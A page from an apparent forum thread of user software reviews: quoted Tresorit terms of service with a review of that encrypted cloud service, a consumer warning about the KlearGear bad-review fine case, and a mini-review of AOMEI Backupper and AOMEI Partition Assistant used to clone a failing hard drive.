62. If You have chosen a plan with no charge ("Free Account") and if Your Free Account was inactive for at least one-hundred and twenty (120) days and no valid User Plan is bound to Your Free Account, Tresorit will send You a notice. Fifteen (15) days after such notice, Tresorit may suspend Your Free Account or delete all of Your Content related to Your Free Account, and/or we may terminate the Agreement between You and Tresorit.

XV Renewal
63. You can use our Services during the agreed time (Subscription period).
64. You agree that Your Subscription is automatically renewed for the same period at the end of the Subscription or Committed Period ("Renewal date") unless You state otherwise one (1) day before the Renewal date.

XVI Suspension
65. Tresorit may monitor the use of our Service.
66. Tresorit may immediately upon notice to You (i) suspend Your or any other user’s right to access or use any portion or all of the Service and/or (ii) suspend Your account(s) and/or (iii) curtail and restrict our Service (e.g. restrict the maximum number of tresors or the maximum number of member per tresor) if:
66.1. We have a reason to believe that You are, or Your account has been used in breach of these Terms or any applicable laws. In such case we may suspend Your account without any prior notice.
66.2. We are unable to verify or authenticate Your provided information to us.
66.3. You are more than 30 days late on any payment (in particular on Your Subscription fees).
66.4. You become the subject of any bankruptcy, dissolution or similar proceeding.
67. Our right to suspend Your or any other user’s right to access or use any portion or all of the Service is in addition to our right to terminate the Agreement.

XVII Effects of Suspension
68. If we suspend Your right to access or use any portion or all of our Service,
68.1. You remain responsible and liable for al fees and charges which have incurred up to the date of suspension;
68.2. You remain responsible and liable for any applicable fees and charges for any Service to which You continue to have access;
68.3. We will not erase and delete any of Your Content as a result of Your suspension, except as specified elsewhere in these Terms.

XVIII Termination by the Customer
69. You may stop using the Service at any time. If You just stop using the Service, this does not terminate the Agreement and Your obligations.
70. Termination for convenience: You may terminate this Agreement in Your sole discretion and for any reason by (i) closing Your account(s) for all Services with an account closing mechanism or (ii) by contacting support at [email protected].
71. There is no refund for any pre-paid service. If You terminate the Subscription, Your Subscription will not be renewed. If Your Subscription included a time commitment (Committed Period) and You terminate the Subscription before the Commitment Period expires, we are entitled to charge You the remaining fees until the end of the commitment.
72. We may ask You for indication of reasons to terminate, but even if we would be quite happy to get feedback, You are not obligated to share such reasons.
73. Termination for cause: You may terminate this Agreement for cause upon 30 day advance notice to Tresorit if there is any material default or breach of the Terms by Tresorit, unless we have cured the material default or breach within the 30 day notice period. In case of termination for cause, we will provide You with a pro-rata refund of any pre-payment.

XIX Termination by Tresorit - Does NOT mention XIV Inactive Free Accounts - NB: this could adversely affect users of FREE Tresorits.
74. Termination for convenience: Tresorit may decide, in its sole discretion and at any time, to discontinue the Service and/or to terminate the Agreement by providing 30 days advance notice. In this case, we will provide You with a pro-rata refund of any pre-payment.
75. Termination for cause: Tresorit may terminate Your account for cause immediately upon notice to You if:
75.1. We have a reason to believe that You are, or Your account has been used in breach of these Terms or any applicable laws. In such case we may terminate the Agreement without any prior notice.
75.2. We are unable to verify or authenticate Your provided information to us.
75.3. You may subject us, our affiliates, or any third party to liability.
75.4. You are more than 60 days late on any payment (in particular on Your Subscription fees).
75.5. In order to comply with the applicable mandatory laws or, to comply with the final court order of a competent judicial body.
75.6. You become the subject of any bankruptcy, dissolution or similar proceeding.

XX Effects of Termination
76. General Effects of termination: upon any termination of this Agreement:
76.1. All Your rights under this Agreement immediately terminate.
76.2. You remain responsible and liable for all fees and charges You have incurred up to the date of termination;
76.3. You agree (i) that You stop any use of the Service or the Licensed Software, (ii) that You erase and delete any Licensed Software You have downloaded on Your Systems or on Your devices and (iii) that You undertake not to access Tresorit’s systems or the Service by whatever way and means; in particular, but not limited to, You undertake not to access the Service via the user account of a third party.
76.4. Sections 3, 9 and 10 of these Terms and in particular all disclaimers, limitations of warranties and damages, and confidential commitments set forth in these Terms or otherwise existing at law survive any termination, expiration or rescission of these Terms.
77. After the termination of the Agreement, Tresorit is entitled to keep or to erase and delete any data and/or Your Content (including, but not limited to, Your Encrypted Content) according to our Privacy Policy.
78. All disclaimers, limitations of warranties and damages, and confidential commitments set forth in these Terms or otherwise existing at law survive any termination, expiration or rescission of these Terms.

XXI Miscellaneous
21.1 Changes in Terms
79. We may revise these Terms from time to time due to changes in our Service and the laws that apply to us and You. If we make any revision, we will notify You to take notice of the "Last Updated" version of these Terms posted on our website and if a revision, in our sole discretion, is material we may provide You additional notice. Any changes will be effective upon posting the revised version of these Terms on the Service. If You do not agree to the new terms, please stop using the Service.
21.2 Governing law and Jurisdiction
80. The Agreement shall be governed by and construed and interpreted in accordance with the substantive laws of Switzerland, excluding the Swiss conflict of law rules. The parties specifically exclude applicability of (i) the United Nations Convention on the Sale of Goods and (ii) any Incoterms.
81. All claims arising out of or relating to these Terms or the Service or the Software must be litigated exclusively at the courts of Zurich, Switzerland, and You and we irrevocably consent to the exclusive jurisdiction of the courts of Zurich, Switzerland.
82. These Terms and all associated Documentation to which they refer to have been written in the English language and the parties agree that the governing language is English. All communications and any dispute associated with these Terms shall be in the English language.
21.3 Severability
83. If any provision of these Terms is held invalid, illegal or unenforceable, such provision shall be enforced to the fullest extent permitted by applicable law and the validity, legality and enforceability of the remaining provisions shall not be affected thereby.
21.4 Identifying You as user
84. Tresorit shall have the right to publish and identify You as a user of the Service. You agree that Tresorit may use any logo and/or name associated with You on our website and other marketing materials in order to identify You as a Tresorit user.
85. We respect Your privacy, and You can ask us to stop identifying You anytime. If we receive Your written notice sent to [email protected] on the day You registered, we don’t have the right to identify You. Afterwards, within 30 day after recipient of such notice sent to [email protected], we shall stop identifying You on any new marketing materials or on our website.
21.5 Other agreements
86. These Terms and all associated Documentation to which they refer to constitute the entire and exclusive agreement between You and Tresorit with respect to the Service, and supersede and replace any prior representations, understandings, contract or oral or written statements regarding Your use of the Service or the subject matter of these Terms.
21.6 Notices
87. You accept that we may send You notices or communications to Your email address provided during registration, or otherwise by any means, in our sole discretion, which by it is likely we can reach You. Any notice shall be deemed delivered if was sent to Your email address provided during registration. It is Your responsibility to regularly check Your email account for new emails and to make sure emails from Tresorit can pass Your spam and/or other filters. All notices sent by You to Tresorit in connection with these Terms be in writing and sent by first class mail or certified mail (receipt being deemed 72 hours after postage and return receipt requested) or personally delivered at the address of Tresorit AG, Büelstrasse 7, CH-9052 Niederteufen, Switzerland.
21.7 Expiration of claims
88. Both parties agree that except for claims related to the indemnification obligations above, all claims arising under or related to these Terms must be brought within two years after the date the cause of action arose.
21.8 Prevailing party
89. In the event either party brings an action against the other to enforce any term of these Terms, the prevailing party in such action shall be entitled to recover the court costs and reasonable attorney’s fees at trial and on any appeal.
21.9 Waiver
90. The failure of either party to enforce a provision is not a waiver of its right to do so later. The waiver by Tresorit of any breach shall not be deemed a waiver of any subsequent breach of the same or any other term of these Terms.
21.10 Remedy
91. Any remedy made available to Tresorit by any of the provisions of these Terms is not intended to be exclusive of any other remedy.
21.11 Third party services and content
92. The Service may contain features and functionalities linking You or providing You with certain functionality and access to third party websites and services. Tresorit has no influence on the contents of these linked pages, dissociates itself herewith explicitly from all such contents, and makes no warranty whatsoever with respect to such links, websites, or services.
21.12 Assignment
93. You may not assign Your rights or obligations under these Terms without Tresorit’s express written consent.
21.13 Third party beneficiary
94. Tresorit and You are not legal partners or agents; instead, our relationship is that of independent contractors. No simple partnership is intended. These Terms create no third party beneficiary rights.
From <https://tresorit.com/legal/terms-of-service>


Needs Improvement:
No notes on this as at this stage. I have not seen any drawbacks in the service/software so far, and the User Interface (which was already quite good) has been improved upon in the newer releases.

Why I think you should use this product/service:
If you are a PC user who wants a secure encrypted Cloud storage service that meets 2 essential security criteria:
  • (a) not US-based and not subject to US laws, and
  • (b) is encrypted (post-SnowdenGate) and successfully protects against US NSA legal/illegal surveillance, with the encryption keys being unknown to the Cloud service provider.
- then Tresorit could be ideal.

How it compares to similar products: (from my direct knowledge and experience, and if I understand correctly)
  • Box.net - does not meet the 2 essential security criteria above.
  • DropBox -  - does not meet the 2 essential security criteria above.
  • GoogleDrive - does not meet the 2 essential security criteria above.
  • SkyDrive - does not meet the 2 essential security criteria above.
  • Wuala - meets the 2 essential security criteria above.

Conclusions:
If you are a PC user who wants a secure encrypted Cloud storage service that distinguishes itself by meeting the above 2 essential security criteria, then using a service such as Tresorit (on a FREE or PAID basis) could be a no-brainer.

124
Why caveat emptor? Well, based on the two slashdot.org posts below, and assuming that they are true/factual, look at this interesting and alleged example of what some people (not me, you understand) might say seems like a potential case of fraudulent B2C (business to customer) e-commerce on the Internet, followed up by what seems to be a malicious attempt at a manufactured/dishonest punitive revenge for a bad (but apparently justifiable) review by the purchaser on ripoffreport.com.

If we make the reasonable assumption that the supplier kleargear.com would, in general, tend to treat all customers/victims relatively consistently - i.e., in the same manner - then we could ask what sort of consumer protection laws there were/are - if any - against this sort of thing.
I presume the prevailing laws would be as per the state of domicile of the business entity involved (in this case kleargear.com's state), but whatever those laws are, they apparently do not seem to in any event prevent a predatory supplier from seemingly ripping-off and then victimising a "protesting customer" in this manner (QED).
Woman Facing $3,500 Fine For Posting Online Review
Posted by Soulskill on Friday November 15, 2013 @03:13PM
from the hidden-so-well-it-didn't-exist dept.

sabri writes "Jen Palmer tried to order something from kleargear.com, some sort of cheap ThinkGeek clone. The merchandise never arrived and she wrote a review on ripoffreport.com. Now, kleargear.com is reporting her to credit agencies and sending collectors to fetch $3,500 as part of a clause which did not exist at the alleged time of purchase. 'By email, a person who did not identify him or herself defended the $3500 charge referring again to Kleargear.com's terms of sale. As for Jen being threatened — remove the post or face a fine — the company said that was not blackmail but rather a, "diligent effort to help them avoid [the fine]."' The terms and conditions shouldn't even apply, since the sales transaction was never completed."

The point about "...the sales transaction was never completed" is actually irrelevant, since, in contract law, a contract exists at the point when these 3 things have occurred:
1. Offer. (e.g., I offer to sell you something at a price of $X.)
2. Acceptance.  (e.g., you accept my offer at that price.)
3. Consideration. (e.g., you pay me the money $X.)

So, if I then fail to deliver (this is called "non-performance") the thing purchased under this contract - and for whatever reason - then I would be in breach of contract, and obliged (in law) to refund the monies paid, plus any penalties for non-performance that may have been stipulated under the terms and conditions of sale (which would have formed part of the contract at the time).
If it is indeed true that kleargear.com subsequently cited "a clause which did not exist at the alleged time of purchase" (i.e., it was not one of the terms and conditions of sale), then this would presumably be either a mistake or a knowingly deceitful/dishonest) statement.

So it is no surprise that we get the report:
Woman Fined For Bad Review Striking Back In Court
Posted by Soulskill on Friday November 29, 2013 @05:07PM
from the jury-to-be-fined-for-unfavorable-verdict dept.

An anonymous reader writes "Here's an update to the earlier Slashdot story about KlearGear.com 'fining' a couple for a bad review left four years earlier on RipoffReport: Not only did KlearGear report this as a bad debt to credit reporting agencies, but KlearGear is hiding behind a DomainsByProxy domain name to making finding their real identities harder. Now Public Citizen is representing the couple and is going after KlearGear for $75,000. The TV station that broke this story, KUTV, now reports that RipoffReport will likely be on the couple's side. The BBB and TRUSTe say their logos were used by KlearGear.com without permission, and credit reporting agency Experian is also investigating."

What I find disconcerting, and why I warn "caveat emptor" is that:
  • Assuming that it is true that kleargear.com are attempting " 'fining' a couple for a bad review left four years earlier on RipoffReport".
  • Assuming that the alleged rippoff (non-performance) by kleargear.com occurred after the point when the contract was agreed to.
  • Assuming it is true that kleargear.com cited "...clause which did not exist at the alleged time of purchase" - and which thus was not part of the contract.
  • Assuming that it is true that "KlearGear is hiding behind a DomainsByProxy domain name to making finding their real identities harder."
  • Assuming that it is true that KlearGear did "report this ["fine"] as a bad debt to credit reporting agencies".
  • Assuming it is true that "Public Citizen is representing the couple and is going after KlearGear for $75,000."
  • Assuming that it is true that "RipoffReport will likely be on the couple's side. The BBB and TRUSTe say their logos were used by KlearGear.com without permission, and credit reporting agency Experian is also investigating."
- then the whole thing rather begins to look like the unravelling of an apparently dubious/fraudulent operation which may have been deliberately set up at the outset to operate in an unscrupulous manner.

Therefore: The question arguably becomes not "what sort of consumer protection laws there were/are" but "How is it that apparently fraudulent organisations are/have been enabled to set up and operate undetected in this manner for years under prevailing state commercial and consumer protection laws?"

Some people (not me you understand) might say that this shows a serious failing of whatever passes for the state legislature to have in place proper and adequate commercial and consumer protection laws.
These people could be wrong, of course, and it might be that there are in place proper and adequate commercial and consumer protection laws, and that kleargear.com and others perhaps yet to be revealed have been successful in operating just below the legislated radar, for a number of years. However, if that were the case, then there could be a potentially very large population of consumers who may have been ripped of without recourse by kleargear.com and others yet to be revealed.

Whatever the case, if it becomes apparent that the consumer who filed the "RipoffReport" might have been unable to stand up for their contractual rights as a consumer, without recourse, and without being subsequently maliciously and deceitfully attacked in a punitive manner by the perpetrator, and only gained recourse and defence after being given assistance by the Public Citizen organisation, then all consumers had better beware, because sure as heck there would seem to be grossly inadequate protection for them under prevailing state commercial/consumer law (QED), with all the advantage apparently being on the side of fraudulent companies who are even protected by being able to be effectively and legally anonymous.
I think it stinks.

Suggested action:
If you do not do so already, then what you probably need to always do as a matter of course, as a consumer, in any B2C transaction is thus protect yourself by:
  • (a) Taking and retaining a copy of details of all online transactions/receipts and related emails and file attachments.
  • (b) Taking and retaining a copy of the Terms & Conditions of the transaction as they are at that point in time. (You have to agree to these Ts&Cs by default at the time of the transaction, agreement is not assumed.)

It also helps to educate yourself by reading the Ts&Cs anyway.
Just as a case in point: Around a week ago I purchased a Spinrite software licence for US$89.00, wanting to see if it could restore my failing hard drive. I was aware that there was a possibility that it might not work - and so is/was the supplier, because they have a "30-day unconditional money back if not completely satisfied" refund policy.
The software was unable to run on my hardware (disk drive) - for the simple technical reason that it was not possible to effect a BIOS switch change to enable it.
So I wrote to GRC.com (the suppliers) and asked for my money back under their refund policy. I got an email in quick response saying that I would be credited via the credit card account I used to make the purchase, no problems. The suppliers GRC.com would seem to show themselves to be an ethical and honest supplier, and I would buy from them again.
The thing is, I would almost certainly not have bought the software licence if I had not read and learned about their refund policy.

125
Originally posted:2013-11-23
Last updated2016-05-03

Basic Info
App Name
(2 apps used consecutively)
AOMEI Backupper FREE (used to clone a drive)
AOMEI Partition Assistant FREE (used to resize a partition)
Thumbs-Up Rating :Thmbsup: :Thmbsup: :Thmbsup: :Thmbsup: :Thmbsup: - that's just for the cloning and partition management; backup was not trialled/tested.
App URLhttp://www.backup-ut...ty.com/download.html
On that page AOMEI Backupper has two alternative installation files:
One size: 60MB, supports both Windows 7/8/Vista/XP and Windows Server 2003/2008/2012 (link to CNET download)
The other size: 20MB, it only supports Windows 7/8 and Server 2008 R2/2012. (link to a "local" download)
App Version ReviewedAOMEI Backupper v1.6
AOMEI Partition Assistant SE v5.2
Note that much newer versions are now available, but these were the ones trialled at the time.
Test System SpecsMS Win7-64 Home Premium
Supported OSesPC Windows (various)
Support MethodsSupport website: http://www.backup-ut...ity.com/support.html
Upgrade PolicyFree upgrades.
Trial Version Available?Not applicable - this is FREEware.
Pricing SchemeAOMEI Backupper + AOMEI Partition Assistant are FREEware.
See also: AOMEI Partition Assistant Professional Edition 5.5 free

Intro and Overview:
For a while now, my trusty HDS PRO - refer Hard Disk Sentinel PRO - Mini-Review - has been telling me about the failing health of my laptop's hard drive - a Seagate 2.5 inch 500GB SATA 7200RPM 16MB Cache Hard Drive Model: ST9500420AS.
The drive's performance status was 100%, but the calculated statistical relevance of several non-fatal error events meant that its health status - that had initially dropped from 100% to 69% and then been stable at that point for months - had started frequently edging downwards in progressive small increments to 55%.
The HDS report Overview at this point stated:
_____________________________
There are 21 bad sectors on the disk surface. The contents of these sectors were moved to the spare area.
Based on the number of remapping operations, the health of the disk was decreased in different steps.
There are 1 weak sectors found on the disk surface. They may be remapped anytime in the later use of the disk.
7408 errors occured during data transfer. This may indicate problem of the device or with data/power cables. It is recommended to examine and replace the cables if possible.
At this point, warranty replacement of the disk is not yet possible, only if the health drops further.
it is recommended to examine the log of the disk regularly. All new problems found will be logged there.
It is recommended to continuously monitor the hard disk status.
_____________________________

So yesterday (a Friday) I took the bull by the horns, figuring that I had better do something about it before it failed completely (though it was fully backed up), otherwise I'd probably have to commit a mountain of time to the recovery.

So I went online and ordered a hard drive I had been keeping my eyes on - a Western Digital Scorpio Black 750GB 16MB 7200rpm 2.5Inch SATA3 Hard Drive Model: WD7500BPKX. (The failing Seagate drive was a discontinued model.)
The supplier is in the same city as myself, so after some thought I sent them a follow-up email asking if they could send it by URGENT courier same day, rather than the normal 2 business days courier delivery.
I got a call from them telling me that it would cost NZ$30 to do that, so I agreed and paid via credit card. I figured it was worth it as it would give me a weekend to sort out any wrinkles. The package duly arrived about 2 hours later that afternoon.

I put the new drive in a USB3 portable hard drive carrier that I bought a while back (it's proved to be a very useful purchase). Then I ran a few tests/inspections on it using HDS - including its 3-built-in tests:
  • Short Self-test.
  • Extended Self-test.
  • Conveyance Self-test.

The latter 2 tests would have run for hours, but I stopped them after about 30mins. with no evidence of any problems. I took screenshots as I went. The old (failing) hard drive had failed its built-in Short and Extended Self-tests within a few minutes.
I then formatted the drive and repeated the inspections/tests. I took screenshots as I went, but there was no difference before/after the formatting. HDS said the new drive was in 100% performance status and 100% health status and all the SMART flags were good.
So I figured it was safe to go ahead and use the disk - it was AOK.

The next thing was - What to do? I had started to use the Win7 system image tool that gives you a once-only chance to write the image to 6 or so CD-ROMs, but it was so incredibly constipated, and I was running out of CD-ROMS (which I rarely use for anything), so I stopped it before writing to the first CD. It said it could resume from there. This was archaic.
So I did what I usually do - gathered some more information. I chanced across a new report that I had been given automatic access to in my Gdrive (Comparison- AwardSpace vs Freehostia- Best Free Hosting). It was from BearWare, so I went to the website and right there I saw the recommendation for AOMEI Backupper. Now BearWare doesn't usually recommend anything unless it meets certain high standards, and his post of the thing mentioned images and clones, so I took a look at the AOMEI Backupper website.

AOMEI Technologies is based in China - as it says here - AOMEI Company:
CHENGDU AOMEI® Tech Co., Ltd.
Address: 3F, SOHO Business Port, No.5 HongJiXin Rd, Chengdu, China
Postcode: 610000
- so that probably explains the awkward use of English. It took me a while to understand that the Cloning function is part of AOMEI Backupper.
On the download page, it distinguished between two alternative installation files for AOMEI Backupper:
  • One size: 60MB, supports both Windows 7/8/Vista/XP and Windows Server 2003/2008/2012 (link to CNET download)
  • The other size: 20MB, it only supports Windows 7/8 and Server 2008 R2/2012. (link to a "local" download)

I downloaded and installed the smaller file, then executed AOMEI Backupper. Click-click-click with the mouse - and in less than 20 seconds I had started cloning my failing Seagate drive to the new WD drive.
It was by then Saturday 2AM. I sat with it for a couple of hours, interested in seeing its progress reports, and making sure that the laptop would not go to sleep and set the screen to switch off after 2 minutes of no keyboard activity (so as to keep the temps down inside the laptop). I estimated that at the rate it was going it would take about 8 hours to complete, and so I went to bed. I was awoken at about 8AM by the HDS alarm gong telling me that the health of the Seagate drive had deteriorated another 1% to 54%, and I noticed that AOMEI Backupper was still busy making the clone with apparently no problem. By 10:05AM, AOMEI Backupper had completed the cloning process and shut the laptop down (as I had set it to do in the options).
So I swapped the old/new drives around. started up the laptop and ran the HP BIOS and system checks. Everything was perfect.
So I let it continue and boot into Windows. No problem.

After running some more tests and fossicking about and making notes, I started up AOMEI Backupper and took screenshots as I went (see following).

Examples - screenshots/clips:
Main GUI window: (going to each menu item)

AOMEI Backupper - 01.png

AOMEI Backupper - 02.png

AOMEI Backupper - 03.png

AOMEI Backupper - 04.png

AOMEI Backupper - 05.png



This is the picture of the cloning result - the cloned drive and the original (failing) drive:

AOMEI Backupper - 06 Clone result.png


This is a screenshot of AOMEI Partition Assistant FREE - after adding the unallocated storage to the C: partition and relabelling the partition:

AOMEI Partition Assistant - 01 Resize partition.png

Who this software is designed for:
Pretty much any PC user who wants a bombproof backup utility. From the website, the software provides:
  • One click backup your system drive to ensure system security
  • Backup disk & partition, create disk images and clone hard drive
  • Support Windows 8/7/Vista/XP and Server 2003/2008/2012 (32/64-bit)

Features include:
  • Backup Features
  • Restore Features
  • Clone Features
  • System Backup: One-click back up all data of system drive, including system files and installed applications, without interrupting work.
  • Disk Backup: Backup your hard disk drives, including MBR disk, GPT disk, external hard drive, USB disk and other storage devices that can be recognized by Windows.
  • Partition Backup: If you just want to backup a partition or dynamic volume, not the entire disk, the feature will be your best choice. With it, you can backup one or multiple partitions/dynamic volumes (including dynamic system volumes).
  • Schedule Backup: Set up a schedule to automatically backup your system and data, especially for users who want to create backups at a lesser frequency or have multiple backup schedules (e.g. daily, weekly, monthly).

The Good:
My trial has made real, live use of 2 software applications:
  • AOMEI Backupper - to produce a fully-functional clone from a failing 500GB hard drive on a new 750GB hard drive.
  • AOMEI Partition Assistant - to add unallocated space on the new (larger) hard drive to the cloned C: drive.
Both applications:
  • ran perfectly.
  • were incredibly simple and easy to use.
  • operated efficiently.
  • would be relatively difficult to make a mistake with (i.e., relatively idiot-proof).
I was/am very impressed with them.
See also: comparison of Drive Imaging backup tools (both free and commercial) - Raymond.cc compares 20 Drive Imaging Tools - AOMEI Backupper was very highly rated.

Needs Improvement:
No notes on this as at this stage. I have not found any drawbacks/limitations in either application so far.

Why I think you should use this product:
If you need good backup functionality, and particularly drive/disk cloning and subsequent partition management (as in my case, for example where I was in serious need of both), then these 2 applications could well be ideal for you.

How it compares to similar products:
I have no experience of using fully integrated backup software like this, so cannot make any useful comment.
AOMEI Backupper and AOMEI Partition Assistant were used consecutively, and did a fine job.

Conclusions:
I was very impressed by the ease and simplicity with which AOMEI Backupper created the clone and AOMEI Partition Assistant assigned the unassigned drive space to the cloned C: drive.
It arguably couldn't have been easier/simpler.
If the rest of the AOMEI Backupper functionality is as good, then I may drop my FreeFileSync backup program in favour of this one.
These applications seem to be so good, I reckon they could be described as "bombproof".

Pages: prev1 2 3 4 [5] 6 7 8 9 10 ... 16next